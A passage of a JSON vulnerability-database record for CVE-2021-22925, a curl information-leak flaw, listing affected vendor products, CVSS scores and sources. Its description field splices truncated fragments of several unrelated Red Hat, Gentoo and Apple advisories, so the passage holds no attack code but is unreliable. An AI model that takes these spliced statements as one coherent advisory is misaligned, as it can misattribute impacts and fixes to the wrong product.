"vendor": "siemens",
"version": "1.0.1.1"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.1.0"
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.26"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.2.1"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.5"
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.2"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.35"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.78.0"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "gte",
"trust": 1.0,
"vendor": "haxx",
"version": "7.7"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.1"
},
{
"_id": null,
"model": "apple mac os x",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c3\u30d7\u30eb",
"version": null
},
{
"_id": null,
"model": "hci management node",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": null,
"trust": 0.8,
"vendor": "fedora",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c3\u30d7\u30eb",
"version": null
},
{
"_id": null,
"model": "mysql",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
"version": null
},
{
"_id": null,
"model": "ontap",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": null,
"trust": 0.8,
"vendor": "haxx",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 0.6
},
"cve": "CVE-2021-22925",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-22925",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-381399",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2021-22925",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-22925",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-22925",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2021-22925",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULHUB",
"id": "VHN-381399",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"description": {
"_id": null,
"data": "curl supports the `-t` command line option, known as `CURLOPT_TELNETOPTIONS`in libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending `NEW_ENV` variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theserver. Therefore potentially revealing sensitive internal information to theserver using a clear-text network protocol.This could happen because curl did not call and use sscanf() correctly whenparsing the string provided by the application. cURL Exists in the use of uninitialized resources.Information may be obtained. Summary:\n\nAn update is now available for OpenShift Logging 5.1. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1944888 - CVE-2021-21409 netty: Request smuggling via content-length header\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Description:\n\nGatekeeper Operator v0.2\n\nGatekeeper is an open source project that applies the OPA Constraint\nFramework to enforce policies on your Kubernetes clusters. \n\nThis advisory contains the container images for Gatekeeper that include\nsecurity updates, and container upgrades. For support options for any other use, see the Gatekeeper\nopen source project website at:\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/. \n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThe requirements to apply the upgraded images are different whether or not\nyou\nused the operator. Complete the following steps, depending on your\ninstallation:\n\n- - Upgrade gatekeeper operator:\nThe gatekeeper operator that is installed by the gatekeeper operator policy\nhas\n`installPlanApproval` set to `Automatic`. This setting means the operator\nwill\nbe upgraded automatically when there is a new version of the operator. No\nfurther action is required for upgrade. If you changed the setting for\n`installPlanApproval` to `manual`, then you must view each cluster to\nmanually\napprove the upgrade to the operator. \n\n- - Upgrade gatekeeper without the operator:\nThe gatekeeper version is specified as part of the Gatekeeper CR in the\ngatekeeper operator policy. To upgrade the gatekeeper version:\na) Determine the latest version of gatekeeper by visiting:\nhttps://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. \nb) Click the tag dropdown, and find the latest static tag. An example tag\nis\n\u0027v3.3.0-1\u0027. \nc) Edit the gatekeeper operator policy and update the image tag to use the\nlatest static tag. For example, you might change this line to image:\n\u0027registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1\u0027. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2021-09-20-7 Additional information for \nAPPLE-SA-2021-09-13-3 macOS Big Sur 11.6\n\nmacOS Big Sur 11.6 addresses the following issues. \n\nCoreGraphics\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted PDF may lead to arbitrary\ncode execution. Apple is aware of a report that this issue may have\nbeen actively exploited. \nDescription: An integer overflow was addressed with improved input\nvalidation. \nCVE-2021-30860: The Citizen Lab\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A permissions issue existed. This issue was addressed\nwith improved permission validation. \nCVE-2021-30827: an anonymous researcher\nEntry added September 20, 2021\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local user may be able to read arbitrary files as root\nDescription: This issue was addressed with improved checks. \nCVE-2021-30828: an anonymous researcher\nEntry added September 20, 2021\n\nCUPS\nAvailable for: macOS Big Sur\nImpact: A local user may be able to execute arbitrary files\nDescription: A URI parsing issue was addressed with improved parsing. \nCVE-2021-22925\nEntry added September 20, 2021\n\nCVMS\nAvailable for: macOS Big Sur\nImpact: A local attacker may be able to elevate their privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro\nEntry added September 20, 2021\n\nFontParser\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted dfont file may lead to\narbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab\nCVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab\nEntry added September 20, 2021\n\nGatekeeper\nAvailable for: macOS Big Sur\nImpact: A malicious application may bypass Gatekeeper checks\nDescription: This issue was addressed with improved checks. \nCVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc. \nEntry added September 20, 2021\n\nImageIO\nAvailable for: macOS Big Sur\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: This issue was addressed with improved checks. \nCVE-2021-30847: Mike Zhang of Pangu Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2021-30830: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2021-30865: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A race condition was addressed with improved locking. \nCVE-2021-30857: Zweig of Kunlun Lab\nEntry added September 20, 2021\n\nKernel\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A type confusion issue was addressed with improved state\nhandling. \nCVE-2021-30859: Apple\nEntry added September 20, 2021\n\nlibexpat\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed by updating expat to version\n2.4.1. \nCVE-2013-0340: an anonymous researcher\nEntry added September 20, 2021\n\nPreferences\nAvailable for: macOS Big Sur\nImpact: An application may be able to access restricted files\nDescription: A validation issue existed in the handling of symlinks. \nThis issue was addressed with improved validation of symlinks. \nCVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)\nof Tencent Security Xuanwu Lab (xlab.tencent.com)\nEntry added September 20, 2021\n\nSandbox\nAvailable for: macOS Big Sur\nImpact: A user may gain access to protected parts of the file system\nDescription: An access issue was addressed with improved access\nrestrictions. \nCVE-2021-30850: an anonymous researcher\nEntry added September 20, 2021\n\nSMB\nAvailable for: macOS Big Sur\nImpact: A local user may be able to read kernel memory\nDescription: An out-of-bounds read was addressed with improved bounds\nchecking. \nCVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs\nEntry added September 20, 2021\n\nSMB\nAvailable for: macOS Big Sur\nImpact: A remote attacker may be able to leak memory\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs\nEntry added September 20, 2021\n\nWebKit\nAvailable for: macOS Big Sur\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited. \nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2021-30858: an anonymous researcher\n\nAdditional recognition\n\nAPFS\nWe would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc. \nfor their assistance. \nEntry added September 20, 2021\n\nApp Support\nWe would like to acknowledge @CodeColorist, an anonymous researcher\nfor their assistance. \nEntry added September 20, 2021\n\nCoreML\nWe would like to acknowledge hjy79425575 working with Trend Micro\nZero Day Initiative for their assistance. \nEntry added September 20, 2021\n\nCUPS\nWe would like to acknowledge an anonymous researcher for their\nassistance. \nEntry added September 20, 2021\n\nKernel\nWe would like to acknowledge Anthony Steinhauser of Google\u0027s Safeside\nproject for their assistance. \nEntry added September 20, 2021\n\nSandbox\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive\nSecurity for their assistance. \nEntry added September 20, 2021\n\nsmbx\nWe would like to acknowledge Zhongcheng Li (CK01) for their\nassistance. \nEntry added September 20, 2021\n\nInstallation note:\n\nThis update may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p\nrhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY\neJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B\n+CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4\n5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv\n4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD\nt6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn\nbwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu\nR7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC\nNlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9\n4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3\n85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw=\n=9bjT\n-----END PGP SIGNATURE-----\n\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ACS 3.67 security and enhancement update\nAdvisory ID: RHSA-2021:4902-01\nProduct: RHACS\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:4902\nIssue date: 2021-12-01\nCVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 \n CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 \n CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 \n CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 \n CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 \n CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 \n CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 \n CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 \n CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 \n CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 \n CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 \n CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 \n CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 \n CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 \n=====================================================================\n\n1. Summary:\n\nUpdated images are now available for Red Hat Advanced Cluster Security for\nKubernetes (RHACS). \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nThe release of RHACS 3.67 provides the following new features, bug fixes,\nsecurity patches and system changes:\n\nOpenShift Dedicated support\n\nRHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on\nAmazon Web Services and Google Cloud Platform. \n\n1. Use OpenShift OAuth server as an identity provider\nIf you are using RHACS with OpenShift, you can now configure the built-in\nOpenShift OAuth server as an identity provider for RHACS. \n\n2. Enhancements for CI outputs\nRed Hat has improved the usability of RHACS CI integrations. CI outputs now\nshow additional detailed information about the vulnerabilities and the\nsecurity policies responsible for broken builds. \n\n3. Runtime Class policy criteria\nUsers can now use RHACS to define the container runtime configuration that\nmay be used to run a pod\u2019s containers using the Runtime Class policy\ncriteria. \n\nSecurity Fix(es):\n\n* civetweb: directory traversal when using the built-in example HTTP\nform-based file upload mechanism via the mg_handle_form_request API\n(CVE-2020-27304)\n\n* nodejs-axios: Regular expression denial of service in trim function\n(CVE-2021-3749)\n\n* nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)\n\n* golang: net: incorrect parsing of extraneous zero characters at the\nbeginning of an IP address octet (CVE-2021-29923)\n\n* helm: information disclosure vulnerability (CVE-2021-32690)\n\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fixes\nThe release of RHACS 3.67 includes the following bug fixes:\n\n1. Previously, when using RHACS with the Compliance Operator integration,\nRHACS did not respect or populate Compliance Operator TailoredProfiles. \nThis has been fixed. \n\n2. Previously, the Alpine Linux package manager (APK) in Image policy\nlooked for the presence of apk package in the image rather than the\napk-tools package. This issue has been fixed. \n\nSystem changes\nThe release of RHACS 3.67 includes the following system changes:\n\n1. Scanner now identifies vulnerabilities in Ubuntu 21.10 images. \n2. The Port exposure method policy criteria now include route as an\nexposure method. \n3. The OpenShift: Kubeadmin Secret Accessed security policy now allows the\nOpenShift Compliance Operator to check for the existence of the Kubeadmin\nsecret without creating a violation. \n4. The OpenShift Compliance Operator integration now supports using\nTailoredProfiles. \n5. The RHACS Jenkins plugin now provides additional security information. \n6. When you enable the environment variable ROX_NETWORK_ACCESS_LOG for\nCentral, the logs contain the Request URI and X-Forwarded-For header\nvalues. \n7. The default uid:gid pair for the Scanner image is now 65534:65534. \n8. RHACS adds a new default Scope Manager role that includes minimum\npermissions to create and modify access scopes. \n9. If microdnf is part of an image or shows up in process execution, RHACS\nreports it as a security violation for the Red Hat Package Manager in Image\nor the Red Hat Package Manager Execution security policies. \n10. In addition to manually uploading vulnerability definitions in offline\nmode, you can now upload definitions in online mode. \n11. You can now format the output of the following roxctl CLI commands in\ntable, csv, or JSON format: image scan, image check \u0026 deployment check\n12. You can now use a regular expression for the deployment name while\nspecifying policy exclusions\n\n3. Solution:\n\nTo take advantage of these new features, fixes and changes, please upgrade\nRed Hat Advanced Cluster Security for Kubernetes to version 3.67. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1978144 - CVE-2021-32690 helm: information disclosure vulnerability\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function\n2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nRHACS-65 - Release RHACS 3.67.0\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-20673\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-27304\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3749\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps://access.redhat.com/security/cve/CVE-2021-3801\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-20266\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cv